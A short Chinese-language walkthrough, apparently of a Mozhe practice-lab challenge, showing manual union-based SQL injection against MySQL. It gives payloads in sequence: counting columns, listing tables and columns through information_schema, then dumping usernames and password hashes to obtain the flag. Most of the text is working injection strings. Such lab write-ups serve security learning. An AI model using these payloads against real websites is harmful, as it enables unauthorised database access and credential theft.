SQL手工测试(MySQL数据库)

1.看到注入点,测试列字段数量,发现为4正常,为5出错,可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误,说明需要解码

6.将密码解码得到的结果也是始终不正确,考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦,获得Key:mozhe69c92e07d1330df9daeaeea8738

相关推荐
日取其半万世不竭2 分钟前
密码管理工具私有化部署,Vaultwarden 备份恢复怎么做?
数据库·docker·容器
填满你的记忆7 分钟前
《为什么 MySQL 不适合做 AI 检索?》
数据库·人工智能·mysql·ai·向量数据库
map1e_zjc8 分钟前
Redis入门笔记
数据库·redis·缓存
Dreamboat¿9 分钟前
Web 框架识别全攻略(含 Spring Boot、Django、Laravel 等)
web安全
步十人18 分钟前
【Redis】高可用集群架构
数据库·redis·架构
霸道流氓气质20 分钟前
批量异步处理 + MQ + Redis 进度追踪实战指南
数据库·redis·状态模式
smart199820 分钟前
数据备份解决方案,适合金融等关键业务需求
数据库·科技·存储
拾起零碎23 分钟前
U8/固定资产反结账报错
数据库·oracle
念恒1230631 分钟前
MySQL connect 访问
数据库·mysql
六月雨滴32 分钟前
Oracle 归档日志性能优化
数据库·oracle·性能优化